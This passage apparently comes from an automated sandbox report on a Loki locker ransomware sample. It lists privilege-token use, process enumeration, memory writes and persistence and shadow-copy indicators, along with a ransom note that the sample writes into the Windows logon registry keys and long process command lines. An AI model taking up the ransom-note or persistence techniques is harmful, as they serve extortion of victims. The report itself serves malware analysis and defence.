N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Frfx\firefox.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\System32\sdiagnhost.exe N/A
N/A N/A C:\Windows\System32\sdiagnhost.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\sdiagnhost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeDebugPrivilege N/A C:\ProgramData\winlogon.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\winlogon.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files\7-Zip\7zG.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\System32\msdt.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A
N/A N/A C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3212 wrote to memory of 5728 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3212 wrote to memory of 3580 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3212 wrote to memory of 2096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 3212 wrote to memory of 4380 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

System policy modification

defense_evasion

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "Encrypted by Loki locker" C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "All your files have been encrypted due to a security problem with your computer\r\nIf you want to restore them, write us to the e-mail: [email protected]\r\nWrite this ID in the title of your message: 9FF76E0A\r\nIn case of no answer in 24 hours write us to this e-mail: [email protected]" C:\Users\Admin\Downloads\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3\e28b0a93649010788bbeda883a08254fefe3710700fc2c5a8dea94ec39402ec3.exe N/A

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://bazaar.abuse.ch/browse.php?search=tag%3Alocker

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2f0,0x2f4,0x2f8,0x2ec,0x318,0x7ffb3574f208,0x7ffb3574f214,0x7ffb3574f220

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1860,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=2184 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2160,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=2152 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2572,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=2580 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3504,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=3556 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3524,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=3540 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=5068,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5084 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4692,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=4888 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4848,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5452 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5476,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5536 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5472,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5544 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5852,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5860 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5852,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5860 /prefetch:8

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6100,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=6460 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6104,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=6432 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6084,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=6484 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --always-read-main-dll --field-trial-handle=6132,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=2936 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --always-read-main-dll --field-trial-handle=5540,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=6524 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5140,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5284 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --always-read-main-dll --field-trial-handle=4904,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5224 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5308,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5036 /prefetch:8

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac\" -ad -an -ai#7zMap23165:190:7zEvent4419

C:\Users\Admin\Downloads\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac.exe

"C:\Users\Admin\Downloads\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6416,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=7084 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5264,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5024 /prefetch:8

C:\Windows\system32\taskmgr.exe

"C:\Windows\system32\taskmgr.exe" /4

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5076,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=6676 /prefetch:8

C:\Users\Admin\Downloads\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac.exe

"C:\Users\Admin\Downloads\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac.exe"

C:\Windows\system32\pcwrun.exe

C:\Windows\system32\pcwrun.exe "C:\Users\Admin\Downloads\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac.exe" ContextMenu

C:\Windows\System32\msdt.exe

C:\Windows\System32\msdt.exe -path C:\Windows\diagnostics\index\PCWDiagnostic.xml -af C:\Users\Admin\AppData\Local\Temp\PCWFFB8.xml /skip TRUE

C:\Windows\System32\sdiagnhost.exe

C:\Windows\System32\sdiagnhost.exe -Embedding

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dxajrlbz\dxajrlbz.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES40D.tmp" "c:\Users\Admin\AppData\Local\Temp\dxajrlbz\CSC2575887E8B184585B3B9C44FB5636CE2.TMP"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\s4sok3ih\s4sok3ih.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES46B.tmp" "c:\Users\Admin\AppData\Local\Temp\s4sok3ih\CSC502B6C4B714E42C08C50A36E9A33D40.TMP"

C:\Users\Admin\Downloads\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac.exe

"C:\Users\Admin\Downloads\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac\eac7ea3969f4483a6f1ed27bad46dbb2f32c40be8f402e6e815d6917cd5731ac.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6668,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=1248 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=3992,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5796 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --always-read-main-dll --field-trial-handle=5260,i,13710717837850662364,14881490622649426260,262144 --variations-seed-version --mojo-platform-channel-handle=5796 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

